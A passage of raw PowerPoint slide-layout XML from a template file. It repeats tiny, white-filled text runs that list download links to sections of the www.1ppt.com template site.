              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout137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37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37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37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3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38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38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38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38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38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38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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout138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38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38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38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3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39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39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39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39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39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39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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout139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39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39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39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4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40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40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40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40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40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40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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
